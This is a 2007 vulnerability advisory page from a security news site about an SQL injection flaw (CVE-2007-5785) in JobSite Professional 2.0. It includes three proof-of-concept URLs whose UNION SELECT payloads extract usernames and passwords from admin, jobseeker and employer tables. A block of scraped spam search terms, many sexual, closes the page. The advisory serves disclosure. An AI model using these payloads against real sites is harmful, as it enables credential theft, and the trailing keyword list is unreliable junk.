about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , JobSite Professional File.PHP SQL injection Vulnerability


Title JobSite Professional File.PHP SQL injection Vulnerability
Published 2007-10-29-12:00AM
Updated 2007-11-15-12:40AM
Class Input Validation Error
CVE   CVE-2007-5785
Remote  Yes
Local  No
Credit  ZynbER is credited with the discovery of this vulnerability.
Vulnerable  NetArt Media JobSite Professional 2.0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/*
http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 14 Dec 2009 21:14:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lesbians namidasex Porno movi SIXY ARAB www.1893d. Modernbill WWW.GOOGLE nina merce Pleyboyxxx priyankase intrushion zhigaoyiqi 18q5.cn VENTRILO Sex cips crack db lanka nude .89 sex. C sex movie news for c X video Focking.co Jjk xxx.xnxx xnxx mp4 geovision woraldsex. JDWX.TV maxcpm.inf Sexvidoe.C hot reshma Karina kap WWW.VIDIO. seeeeeeeee 200 /compo Telugu sex Www Englis BT Voyager webcams php-nuke 2 HTTP POST lhwaia AsIN d-link Fatsex Www.realse Apache 0.6 www.80845. WoltLab GET+%252Fg